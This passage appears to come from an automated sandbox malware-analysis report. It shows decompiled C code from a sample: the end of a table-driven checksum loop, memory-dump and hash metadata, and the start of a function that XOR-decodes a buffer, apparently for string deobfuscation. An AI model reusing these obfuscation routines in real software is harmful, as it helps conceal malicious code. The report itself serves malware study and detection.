((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x18) * 4) ^  *(0x41beb0 + (_t110 & 0x000000ff) * 4) ^  *(_t181 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t214 >> 0x18) * 4) ^  *(0x41beb0 + (_t214 & 0x000000ff) * 4) ^  *(_t182 - 4);
						_t175 = _t182 + 4;
						_t239 = _t239 - 0x20;
						_t87 =  *(0x41b6b0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (_t119 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t119 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t119 >> 0x18) * 4) ^  *(0x41beb0 + (_t119 & 0x000000ff) * 4) ^  *(_t175 - 4)) >> 0x18) * 4) ^  *(0x41beb0 + (_t223 & 0x000000ff) * 4);
						_t238 = _t238 - 1;
					} while (_t238 != 0);
				}
				if(_t239 >= 4) {
					_t188 = _t239 >> 2;
					do {
						_t90 = _t87 ^  *_t175;
						_t175 = _t175 + 4;
						_t239 = _t239 - 4;
						_t188 = _t188 - 1;
						_t87 =  *(0x41b6b0 + (_t90 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (_t90 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t90 >> 0x18) * 4) ^  *(0x41beb0 + (_t90 & 0x000000ff) * 4);
					} while (_t188 != 0);
				}
				if(_t239 != 0) {
					do {
						_t87 = _t87 >> 0x00000008 ^  *(0x41b2b0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t239 = _t239 - 1;
					} while (_t239 != 0);
				}
				return  !_t87;
			}














                                                                                                                                                                      0x004028b0
                                                                                                                                                                      0x004028b1
                                                                                                                                                                      0x004028b3
                                                                                                                                                                      0x004028b7
                                                                                                                                                                      0x004028c0
                                                                                                                                                                      0x004028d3
                                                                                                                                                                      0x004028da
                                                                                                                                                                      0x004028db
                                                                                                                                                                      0x004028de
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004028de
                                                                                                                                                                      0x004028c0
                                                                                                                                                                      0x004028e0
                                                                                                                                                                      0x004028e5
                                                                                                                                                                      0x004028ed
                                                                                                                                                                      0x004028f0
                                                                                                                                                                      0x004028f0
                                                                                                                                                                      0x00402931
                                                                                                                                                                      0x00402934
                                                                                                                                                                      0x00402976
                                                                                                                                                                      0x00402979
                                                                                                                                                                      0x004029bb
                                                                                                                                                                      0x00402a3c
                                                                                                                                                                      0x00402a7b
                                                                                                                                                                      0x00402a7e
                                                                                                                                                                      0x00402a81
                                                                                                                                                                      0x00402ac0
                                                                                                                                                                      0x00402afb
                                                                                                                                                                      0x00402b02
                                                                                                                                                                      0x00402b02
                                                                                                                                                                      0x004028f0
                                                                                                                                                                      0x00402b0e
                                                                                                                                                                      0x00402b12
                                                                                                                                                                      0x00402b15
                                                                                                                                                                      0x00402b15
                                                                                                                                                                      0x00402b17
                                                                                                                                                                      0x00402b56
                                                                                                                                                                      0x00402b59
                                                                                                                                                                      0x00402b5c
                                                                                                                                                                      0x00402b5c
                                                                                                                                                                      0x00402b15
                                                                                                                                                                      0x00402b64
                                                                                                                                                                      0x00402b70
                                                                                                                                                                      0x00402b7e
                                                                                                                                                                      0x00402b85
                                                                                                                                                                      0x00402b86
                                                                                                                                                                      0x00402b86
                                                                                                                                                                      0x00402b70
                                                                                                                                                                      0x00402b8e

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                      • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                                                      • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02412B17 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                      • Instruction ID: ba47f04bd3440b5a15b6ef881d96f13d3a23a7aee11ddeb5971f1d44ba344932
                                                                                                                                                                      • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E615D3266066747E394CF6CEDC47663762EB89315F19C670CA008B666CB39A52297CC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401650 Relevance: .1, Instructions: 111COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00401650(signed char* _a4, intOrPtr _a8) {
				char _v4;
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed char _v13;
				signed char _v14;
				signed char _v15;
				signed char _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				signed char _v21;
				signed char _v22;
				signed char _v23;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed char _v27;
				signed char _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				signed char _v32;
				signed char _v33;
				signed char _v34;
				signed char _v35;
				signed char _v36;
				void* __esi;
				signed char* _t68;
				intOrPtr _t72;
				void* _t137;
				intOrPtr _t138;

				_t68 = _a4;
				_v36 =  *_t68 & 0x000000ff ^ 0x000000a3;
				_v35 = _t68[1] & 0x000000ff ^ 0x00000054;
				_v34 =  !(_t68[2] & 0x000000ff);
				_v33 = _t68[3] & 0x000000ff ^ 0x00000075;
				_v32 = _t68[4] & 0x000000ff ^ 0x000000e7;
				_v31 = _t68[5] & 0x000000ff ^ 0x00000044;
				_v30 = _t68[6] & 0x000000ff ^ 0x0000004b;
				_v29 = _t68[7] & 0x000000ff ^ 0x00000023;
				_v28 = _t68[8] & 0x000000ff ^ 0x000000bf;
				_v27 = _t68[9] & 0x000000ff ^ 0x00000045;
				_v26 = _t68[0xa] & 0x000000ff ^ 0x0000003b;
				_v25 = _t68[0xb] & 0x000000ff ^ 0x00000056;
				_v24 = _t68[0xc] & 0x000000ff ^ 0x000000f8;
				_v23 = _t68[0xd] & 0x000000ff ^ 0x00000098;
				_v22 = _t68[0xe] & 0x000000ff ^ 0x0000005b;
				_v21 = _t68[0xf] & 0x000000ff ^ 0x000000f4;
				_v20 = _t68[0x10] & 0x000000ff ^ 0x000000b5;
				_v19 = _t68[0x11] & 0x000000ff ^ 0x00000087;
				_v18 = _t68[0x12] & 0x000000ff ^ 0x0000007b;
				_v17 = _t68[0x13] & 0x000000ff ^ 0x0000000f;
				_v16 = _t68[0x14] & 0x000000ff ^ 0x000000f4;
				_v15 = _t68[0x15] & 0x000000ff ^ 0x00000076;
				_v14 = _t68[0x16] & 0x000000ff ^ 0x000000b9;
				_v13 = _t68[0x17] & 0x000000ff ^ 0x00000034;
				_v12 = _t68[0x18] & 0x000000ff ^ 0x000000bf;
				_v11 = _t68[0x19] & 0x000000ff ^ 0x0000001e;
				_t138 = _a8;
				_v10 = _t68[0x1a] & 0x000000ff ^ 0x000000e7;
				_v9 = _t68[0x1b] & 0x000000ff ^ 0x00000078;
				_v8 = _t68[0x1c] & 0x000000ff ^ 0x00000098;
